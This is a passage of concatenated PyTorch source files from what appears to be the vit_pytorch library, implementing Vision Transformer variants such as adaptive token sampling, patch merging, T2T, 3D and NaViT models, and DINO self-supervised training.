nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0., output_num_tokens = None): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.output_num_tokens = output_num_tokens self.ats = AdaptiveTokenSampling(output_num_tokens) if exists(output_num_tokens) else None self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x, *, mask): num_tokens = x.shape[1] x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale if exists(mask): dots_mask = rearrange(mask, 'b i -> b 1 i 1') * rearrange(mask, 'b j -> b 1 1 j') mask_value = -torch.finfo(dots.dtype).max dots = dots.masked_fill(~dots_mask, mask_value) attn = self.attend(dots) attn = self.dropout(attn) sampled_token_ids = None # if adaptive token sampling is enabled # and number of tokens is greater than the number of output tokens if exists(self.output_num_tokens) and (num_tokens - 1) > self.output_num_tokens: attn, mask, sampled_token_ids = self.ats(attn, v, mask = mask) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out), mask, sampled_token_ids class Transformer(nn.Module): def __init__(self, dim, depth, max_tokens_per_depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() assert len(max_tokens_per_depth) == depth, 'max_tokens_per_depth must be a tuple of length that is equal to the depth of the transformer' assert sorted(max_tokens_per_depth, reverse = True) == list(max_tokens_per_depth), 'max_tokens_per_depth must be in decreasing order' assert min(max_tokens_per_depth) > 0, 'max_tokens_per_depth must have at least 1 token at any layer' self.layers = nn.ModuleList([]) for _, output_num_tokens in zip(range(depth), max_tokens_per_depth): self.layers.append(nn.ModuleList([ Attention(dim, output_num_tokens = output_num_tokens, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): b, n, device = *x.shape[:2], x.device # use mask to keep track of the paddings when sampling tokens # as the duplicates (when sampling) are just removed, as mentioned in the paper mask = torch.ones((b, n), device = device, dtype = torch.bool) token_ids = torch.arange(n, device = device) token_ids = repeat(token_ids, 'n -> b n', b = b) for attn, ff in self.layers: attn_out, mask, sampled_token_ids = attn(x, mask = mask) # when token sampling, one needs to then gather the residual tokens with the sampled token ids if exists(sampled_token_ids): x = batched_index_select(x, sampled_token_ids, dim = 1) token_ids = batched_index_select(token_ids, sampled_token_ids, dim = 1) x = x + attn_out x = ff(x) + x return x, token_ids class ViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, max_tokens_per_depth, heads, mlp_dim, channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0.): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, max_tokens_per_depth, heads, dim_head, mlp_dim, dropout) self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img, return_sampled_token_ids = False): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :(n + 1)] x = self.dropout(x) x, token_ids = self.transformer(x) logits = self.mlp_head(x[:, 0]) if return_sampled_token_ids: # remove CLS token and decrement by 1 to make -1 the padding token_ids = token_ids[:, 1:] - 1 return logits, token_ids return logits File: vit_pytorch/vit_with_patch_merger.py import torch from torch import nn from einops import rearrange, repeat from einops.layers.torch import Rearrange, Reduce # helpers def exists(val): return val is not None def default(val ,d): return val if exists(val) else d def pair(t): return t if isinstance(t, tuple) else (t, t) # patch merger class class PatchMerger(nn.Module): def __init__(self, dim, num_tokens_out): super().__init__() self.scale = dim ** -0.5 self.norm = nn.LayerNorm(dim) self.queries = nn.Parameter(torch.randn(num_tokens_out, dim)) def forward(self, x): x = self.norm(x) sim = torch.matmul(self.queries, x.transpose(-1, -2)) * self.scale attn = sim.softmax(dim = -1) return torch.matmul(attn, x) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads project_out = not (heads == 1 and dim_head == dim) self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) if project_out else nn.Identity() def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0., patch_merge_layer = None, patch_merge_num_tokens = 8): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) self.patch_merge_layer_index = default(patch_merge_layer, depth // 2) - 1 # default to mid-way through transformer, as shown in paper self.patch_merger = PatchMerger(dim = dim, num_tokens_out = patch_merge_num_tokens) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for index, (attn, ff) in enumerate(self.layers): x = attn(x) + x x = ff(x) + x if index == self.patch_merge_layer_index: x = self.patch_merger(x) return self.norm(x) class ViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, patch_merge_layer = None, patch_merge_num_tokens = 8, channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0.): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout, patch_merge_layer, patch_merge_num_tokens) self.mlp_head = nn.Sequential( Reduce('b n d -> b d', 'mean'), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape x += self.pos_embedding[:, :n] x = self.dropout(x) x = self.transformer(x) return self.mlp_head(x) File: vit_pytorch/t2t.py import math import torch from torch import nn from vit_pytorch.vit import Transformer from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def conv_output_size(image_size, kernel_size, stride, padding): return int(((image_size - kernel_size + (2 * padding)) / stride) + 1) # classes class RearrangeImage(nn.Module): def forward(self, x): return rearrange(x, 'b (h w) c -> b c h w', h = int(math.sqrt(x.shape[1]))) # main class class T2TViT(nn.Module): def __init__(self, *, image_size, num_classes, dim, depth = None, heads = None, mlp_dim = None, pool = 'cls', channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0., transformer = None, t2t_layers = ((7, 4), (3, 2), (3, 2))): super().__init__() assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' layers = [] layer_dim = channels output_image_size = image_size for i, (kernel_size, stride) in enumerate(t2t_layers): layer_dim *= kernel_size ** 2 is_first = i == 0 is_last = i == (len(t2t_layers) - 1) output_image_size = conv_output_size(output_image_size, kernel_size, stride, stride // 2) layers.extend([ RearrangeImage() if not is_first else nn.Identity(), nn.Unfold(kernel_size = kernel_size, stride = stride, padding = stride // 2), Rearrange('b c n -> b n c'), Transformer(dim = layer_dim, heads = 1, depth = 1, dim_head = layer_dim, mlp_dim = layer_dim, dropout = dropout) if not is_last else nn.Identity(), ]) layers.append(nn.Linear(layer_dim, dim)) self.to_patch_embedding = nn.Sequential(*layers) self.pos_embedding = nn.Parameter(torch.randn(1, output_image_size ** 2 + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) if not exists(transformer): assert all([exists(depth), exists(heads), exists(mlp_dim)]), 'depth, heads, and mlp_dim must be supplied' self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) else: self.transformer = transformer self.pool = pool self.to_latent = nn.Identity() self.mlp_head = nn.Linear(dim, num_classes) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :n+1] x = self.dropout(x) x = self.transformer(x) x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0] x = self.to_latent(x) return self.mlp_head(x) File: vit_pytorch/vit_3d.py import torch from torch import nn from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads project_out = not (heads == 1 and dim_head == dim) self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) if project_out else nn.Identity() def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class ViT(nn.Module): def __init__(self, *, image_size, image_patch_size, frames, frame_patch_size, num_classes, dim, depth, heads, mlp_dim, pool = 'cls', channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0.): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(image_patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' assert frames % frame_patch_size == 0, 'Frames must be divisible by frame patch size' num_patches = (image_height // patch_height) * (image_width // patch_width) * (frames // frame_patch_size) patch_dim = channels * patch_height * patch_width * frame_patch_size assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' self.to_patch_embedding = nn.Sequential( Rearrange('b c (f pf) (h p1) (w p2) -> b (f h w) (p1 p2 pf c)', p1 = patch_height, p2 = patch_width, pf = frame_patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) self.pool = pool self.to_latent = nn.Identity() self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, video): x = self.to_patch_embedding(video) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '1 1 d -> b 1 d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :(n + 1)] x = self.dropout(x) x = self.transformer(x) x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0] x = self.to_latent(x) return self.mlp_head(x) File: vit_pytorch/na_vit.py from __future__ import annotations from functools import partial from typing import List import torch import torch.nn.functional as F from torch import nn, Tensor from torch.nn.utils.rnn import pad_sequence as orig_pad_sequence from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def always(val): return lambda *args: val def pair(t): return t if isinstance(t, tuple) else (t, t) def divisible_by(numer, denom): return (numer % denom) == 0 # auto grouping images def group_images_by_max_seq_len( images: List[Tensor], patch_size: int, calc_token_dropout = None, max_seq_len = 2048 ) -> List[List[Tensor]]: calc_token_dropout = default(calc_token_dropout, always(0.)) groups = [] group = [] seq_len = 0 if isinstance(calc_token_dropout, (float, int)): calc_token_dropout = always(calc_token_dropout) for image in images: assert isinstance(image, Tensor) image_dims = image.shape[-2:] ph, pw = map(lambda t: t // patch_size, image_dims) image_seq_len = (ph * pw) image_seq_len = int(image_seq_len * (1 - calc_token_dropout(*image_dims))) assert image_seq_len <= max_seq_len, f'image with dimensions {image_dims} exceeds maximum sequence length' if (seq_len + image_seq_len) > max_seq_len: groups.append(group) group = [] seq_len = 0 group.append(image) seq_len += image_seq_len if len(group) > 0: groups.append(group) return groups # normalization # they use layernorm without bias, something that pytorch does not offer class LayerNorm(nn.Module): def __init__(self, dim): super().__init__() self.gamma = nn.Parameter(torch.ones(dim)) self.register_buffer('beta', torch.zeros(dim)) def forward(self, x): return F.layer_norm(x, x.shape[-1:], self.gamma, self.beta) # they use a query-key normalization that is equivalent to rms norm (no mean-centering, learned gamma), from vit 22B paper class RMSNorm(nn.Module): def __init__(self, heads, dim): super().__init__() self.scale = dim ** 0.5 self.gamma = nn.Parameter(torch.ones(heads, 1, dim)) def forward(self, x): normed = F.normalize(x, dim = -1) return normed * self.scale * self.gamma # feedforward def FeedForward(dim, hidden_dim, dropout = 0.): return nn.Sequential( LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.norm = LayerNorm(dim) self.q_norm = RMSNorm(heads, dim_head) self.k_norm = RMSNorm(heads, dim_head) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_q = nn.Linear(dim, inner_dim, bias = False) self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim, bias = False), nn.Dropout(dropout) ) def forward( self, x, context = None, mask = None, attn_mask = None ): x = self.norm(x) kv_input = default(context, x) qkv = (self.to_q(x), *self.to_kv(kv_input).chunk(2, dim = -1)) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) q = self.q_norm(q) k = self.k_norm(k) dots = torch.matmul(q, k.transpose(-1, -2)) if exists(mask): mask = rearrange(mask, 'b j -> b 1 1 j') dots = dots.masked_fill(~mask, -torch.finfo(dots.dtype).max) if exists(attn_mask): dots = dots.masked_fill(~attn_mask, -torch.finfo(dots.dtype).max) attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) self.norm = LayerNorm(dim) def forward( self, x, mask = None, attn_mask = None ): for attn, ff in self.layers: x = attn(x, mask = mask, attn_mask = attn_mask) + x x = ff(x) + x return self.norm(x) class NaViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0., token_dropout_prob = None): super().__init__() image_height, image_width = pair(image_size) # what percent of tokens to dropout # if int or float given, then assume constant dropout prob # otherwise accept a callback that in turn calculates dropout prob from height and width self.calc_token_dropout = None if callable(token_dropout_prob): self.calc_token_dropout = token_dropout_prob elif isinstance(token_dropout_prob, (float, int)): assert 0. <= token_dropout_prob < 1. token_dropout_prob = float(token_dropout_prob) self.calc_token_dropout = lambda height, width: token_dropout_prob # calculate patching related stuff assert divisible_by(image_height, patch_size) and divisible_by(image_width, patch_size), 'Image dimensions must be divisible by the patch size.' patch_height_dim, patch_width_dim = (image_height // patch_size), (image_width // patch_size) patch_dim = channels * (patch_size ** 2) self.channels = channels self.patch_size = patch_size self.to_patch_embedding = nn.Sequential( LayerNorm(patch_dim), nn.Linear(patch_dim, dim), LayerNorm(dim), ) self.pos_embed_height = nn.Parameter(torch.randn(patch_height_dim, dim)) self.pos_embed_width = nn.Parameter(torch.randn(patch_width_dim, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) # final attention pooling queries self.attn_pool_queries = nn.Parameter(torch.randn(dim)) self.attn_pool = Attention(dim = dim, dim_head = dim_head, heads = heads) # output to logits self.to_latent = nn.Identity() self.mlp_head = nn.Sequential( LayerNorm(dim), nn.Linear(dim, num_classes, bias = False) ) @property def device(self): return next(self.parameters()).device def forward( self, batched_images: List[Tensor] | List[List[Tensor]], # assume different resolution images already grouped correctly group_images = False, group_max_seq_len = 2048 ): p, c, device, has_token_dropout = self.patch_size, self.channels, self.device, exists(self.calc_token_dropout) and self.training arange = partial(torch.arange, device = device) pad_sequence = partial(orig_pad_sequence, batch_first = True) # auto pack if specified if group_images: batched_images = group_images_by_max_seq_len( batched_images, patch_size = self.patch_size, calc_token_dropout = self.calc_token_dropout if self.training else None, max_seq_len = group_max_seq_len ) # if List[Tensor] is not grouped -> List[List[Tensor]] if torch.is_tensor(batched_images[0]): batched_images = [batched_images] # process images into variable lengthed sequences with attention mask num_images = [] batched_sequences = [] batched_positions = [] batched_image_ids = [] for images in batched_images: num_images.append(len(images)) sequences = [] positions = [] image_ids = torch.empty((0,), device = device, dtype = torch.long) for image_id, image in enumerate(images): assert image.ndim ==3 and image.shape[0] == c image_dims = image.shape[-2:] assert all([divisible_by(dim, p) for dim in image_dims]), f'height and width {image_dims} of images must be divisible by patch size {p}' ph, pw = map(lambda dim: dim // p, image_dims) pos = torch.stack(torch.meshgrid(( arange(ph), arange(pw) ), indexing = 'ij'), dim = -1) pos = rearrange(pos, 'h w c -> (h w) c') seq = rearrange(image, 'c (h p1) (w p2) -> (h w) (c p1 p2)', p1 = p, p2 = p) seq_len = seq.shape[-2] if has_token_dropout: token_dropout = self.calc_token_dropout(*image_dims) num_keep = max(1, int(seq_len * (1 - token_dropout))) keep_indices = torch.randn((seq_len,), device = device).topk(num_keep, dim = -1).indices seq = seq[keep_indices] pos = pos[keep_indices] image_ids = F.pad(image_ids, (0, seq.shape[-2]), value = image_id) sequences.append(seq) positions.append(pos) batched_image_ids.append(image_ids) batched_sequences.append(torch.cat(sequences, dim = 0)) batched_positions.append(torch.cat(positions, dim = 0)) # derive key padding mask lengths = torch.tensor([seq.shape[-2] for seq in batched_sequences], device = device, dtype = torch.long) seq_arange = arange(lengths.amax().item()) key_pad_mask = rearrange(seq_arange, 'n -> 1 n') < rearrange(lengths, 'b -> b 1') # derive attention mask, and combine with key padding mask from above batched_image_ids = pad_sequence(batched_image_ids) attn_mask = rearrange(batched_image_ids, 'b i -> b 1 i 1') == rearrange(batched_image_ids, 'b j -> b 1 1 j') attn_mask = attn_mask & rearrange(key_pad_mask, 'b j -> b 1 1 j') # combine patched images as well as the patched width / height positions for 2d positional embedding patches = pad_sequence(batched_sequences) patch_positions = pad_sequence(batched_positions) # need to know how many images for final attention pooling num_images = torch.tensor(num_images, device = device, dtype = torch.long) # to patches x = self.to_patch_embedding(patches) # factorized 2d absolute positional embedding h_indices, w_indices = patch_positions.unbind(dim = -1) h_pos = self.pos_embed_height[h_indices] w_pos = self.pos_embed_width[w_indices] x = x + h_pos + w_pos # embed dropout x = self.dropout(x) # attention x = self.transformer(x, attn_mask = attn_mask) # do attention pooling at the end max_queries = num_images.amax().item() queries = repeat(self.attn_pool_queries, 'd -> b n d', n = max_queries, b = x.shape[0]) # attention pool mask image_id_arange = arange(max_queries) attn_pool_mask = rearrange(image_id_arange, 'i -> i 1') == rearrange(batched_image_ids, 'b j -> b 1 j') attn_pool_mask = attn_pool_mask & rearrange(key_pad_mask, 'b j -> b 1 j') attn_pool_mask = rearrange(attn_pool_mask, 'b i j -> b 1 i j') # attention pool x = self.attn_pool(queries, context = x, attn_mask = attn_pool_mask) + queries x = rearrange(x, 'b n d -> (b n) d') # each batch element may not have same amount of images is_images = image_id_arange < rearrange(num_images, 'b -> b 1') is_images = rearrange(is_images, 'b n -> (b n)') x = x[is_images] # project out to logits x = self.to_latent(x) return self.mlp_head(x) File: vit_pytorch/dino.py import copy import random from functools import wraps, partial import torch from torch import nn import torch.nn.functional as F from torchvision import transforms as T # helper functions def exists(val): return val is not None def default(val, default): return val if exists(val) else default def singleton(cache_key): def inner_fn(fn): @wraps(fn) def wrapper(self, *args, **kwargs): instance = getattr(self, cache_key) if instance is not None: return instance instance = fn(self, *args, **kwargs) setattr(self, cache_key, instance) return instance return wrapper return inner_fn def get_module_device(module): return next(module.parameters()).device def set_requires_grad(model, val): for p in model.parameters(): p.requires_grad = val # loss function # (algorithm 1 in the paper) def loss_fn( teacher_logits, student_logits, teacher_temp, student_temp, centers, eps = 1e-20 ): teacher_logits = teacher_logits.detach() student_probs = (student_logits / student_temp).softmax(dim = -1) teacher_probs = ((teacher_logits - centers) / teacher_temp).softmax(dim = -1) return - (teacher_probs * torch.log(student_probs + eps)).sum(dim = -1).mean() # augmentation utils class RandomApply(nn.Module): def __init__(self, fn, p): super().__init__() self.fn = fn self.p = p def forward(self, x): if random.random() > self.p: return x return self.fn(x) # exponential moving average class EMA(): def __init__(self, beta): super().__init__() self.beta = beta def update_average(self, old, new): if old is None: return new return old * self.beta + (1 - self.beta) * new def update_moving_average(ema_updater, ma_model, current_model): for current_params, ma_params in zip(current_model.parameters(), ma_model.parameters()): old_weight, up_weight = ma_params.data, current_params.data ma_params.data = ema_updater.update_average(old_weight, up_weight) # MLP class for projector and predictor class L2Norm(nn.Module): def forward(self, x, eps = 1e-6): norm = x.norm(dim = 1, keepdim = True).clamp(min = eps) return x / norm class MLP(nn.Module): def __init__(self, dim, dim_out, num_layers, hidden_size = 256): super().__init__() layers = [] dims = (dim, *((hidden_size,) * (num_layers - 1))) for ind, (layer_dim_in, layer_dim_out) in enumerate(zip(dims[:-1], dims[1:])): is_last = ind == (len(dims) - 1) layers.extend([ nn.Linear(layer_dim_in, layer_dim_out), nn.GELU() if not is_last else nn.Identity() ]) self.net = nn.Sequential( *layers, L2Norm(), nn.Linear(hidden_size, dim_out) ) def forward(self, x): return self.net(x) # a wrapper class for the base neural network # will manage the interception of the hidden layer output # and pipe it into the projecter and predictor nets class NetWrapper(nn.Module): def __init__(self, net, output_dim, projection_hidden_size, projection_num_layers, layer = -2): super().__init__() self.net = net self.layer = layer self.projector = None self.projection_hidden_size = projection_hidden_size self.projection_num_layers = projection_num_layers self.output_dim = output_dim self.hidden = {} self.hook_registered = False def _find_layer(self): if type(self.layer) == str: modules = dict([*self.net.named_modules()]) return modules.get(self.layer, None) elif type(self.layer) == int: children = [*self.net.children()] return children[self.layer] return None def _hook(self, _, input, output): device = input[0].device self.hidden[device] = output.flatten(1) def _register_hook(self): layer = self._find_layer() assert layer is not None, f'hidden layer ({self.layer}) not found' handle = layer.register_forward_hook(self._hook) self.hook_registered = True @singleton('projector') def _get_projector(self, hidden): _, dim = hidden.shape projector = MLP(dim, self.output_dim, self.projection_num_layers, self.projection_hidden_size) return projector.to(hidden) def get_embedding(self, x): if self.layer == -1: return self.net(x) if not self.hook_registered: self._register_hook() self.hidden.clear() _ = self.net(x) hidden = self.hidden[x.device] self.hidden.clear() assert hidden is not None, f'hidden layer {self.layer} never emitted an output' return hidden def forward(self, x, return_projection = True): embed = self.get_embedding(x) if not return_projection: return embed projector = self._get_projector(embed) return projector(embed), embed # main class class Dino(nn.Module): def __init__( self, net, image_size, hidden_layer = -2, projection_hidden_size = 256, num_classes_K = 65336, projection_layers = 4, student_temp = 0.9, teacher_temp = 0.04, local_upper_crop_scale = 0.4, global_lower_crop_scale = 0.5, moving_average_decay = 0.9, center_moving_average_decay = 0.9, augment_fn = None, augment_fn2 = None ): super().__init__() self.net = net # default BYOL augmentation DEFAULT_AUG = torch.nn.Sequential( RandomApply( T.ColorJitter(0.8, 0.8, 0.8, 0.2), p = 0.3 ), T.RandomGrayscale(p=0.2), T.RandomHorizontalFlip(), RandomApply( T.GaussianBlur((3, 3), (1.0, 2.0)), p = 0.2 ), T.Normalize( mean=torch.tensor([0.485, 0.456, 0.406]), std=torch.tensor([0.229, 0.224, 0.225])), ) self.augment1 = default(augment_fn, DEFAULT_AUG) self.augment2 = default(augment_fn2, DEFAULT_AUG) # local and global crops self.local_crop = T.RandomResizedCrop((image_size, image_size), scale = (0.05, local_upper_crop_scale)) self.global_crop = T.RandomResizedCrop((image_size, image_size), scale = (global_lower_crop_scale, 1.)) self.student_encoder = NetWrapper(net, num_classes_K, projection_hidden_size, projection_layers, layer = hidden_layer) self.teacher_encoder = None self.teacher_ema_updater = EMA(moving_average_decay) self.register_buffer('teacher_centers', torch.zeros(1, num_classes_K)) self.register_buffer('last_teacher_centers', torch.zeros(1, num_classes_K)) self.teacher_centering_ema_updater = EMA(center_moving_average_decay) self.student_temp = student_temp self.teacher_temp = teacher_temp # get device of network and make wrapper same device device = get_module_device(net) self.to(device) # send a mock image tensor to instantiate singleton parameters self.forward(torch.randn(2, 3, image_size, image_size, device=device)) @singleton('teacher_encoder') def _get_teacher_encoder(self): teacher_encoder = copy.deepcopy(self.student_encoder) set_requires_grad(teacher_encoder, False) return teacher_encoder def reset_moving_average(self): del self.teacher_encoder self.teacher_encoder = None def update_moving_average(self): assert self.teacher_encoder is not None, 'target encoder has not been created yet' update_moving_average(self.teacher_ema_updater, self.teacher_encoder, self.student_encoder) new_teacher_centers = self.teacher_centering_ema_updater.update_average(self.teacher_centers, self.last_teacher_centers) self.teacher_centers.copy_(new_teacher_centers) def forward( self, x, return_embedding = False, return_projection = True, student_temp = None, teacher_temp = None ): if return_embedding: return self.student_encoder(x, return_projection = return_projection) image_one, image_two = self.augment1(x), self.augment2(x) local_image_one, local_image_two = self.local_crop(image_one), self.local_crop(image_two) global_image_one, global_image_two = self.global_crop(image_one), self.global_crop(image_two) student_proj_one, _ = self.student_encoder(local_image_one) student_proj_two, _ = self.student_encoder(local_image_two) with torch.no_grad(): teacher_encoder = self._get_teacher_encoder() teacher_proj_one, _ = teacher_encoder(global_image_one) teacher_proj_two, _ = teacher_encoder(global_image_two) loss_fn_ = partial( loss_fn, student_temp = default(student_temp, self.student_temp), teacher_temp = default(teacher_temp, self.teacher_temp), centers = self.teacher_centers ) teacher_logits_avg = torch.cat((teacher_proj_one, teacher_proj_two)).mean(dim = 0) self.last_teacher_centers.copy_(teacher_logits_avg) loss = (loss_fn_(teacher_proj_one, student_proj_two) + loss_fn_(teacher_proj_two, student_proj_one)) / 2 return loss File: vit_pytorch/vit_1d.py import torch from torch import nn from einops import rearrange, repeat, pack, unpack from einops.layers.torch import Rearrange # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads project_out = not (heads == 1 and dim_head == dim) self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) 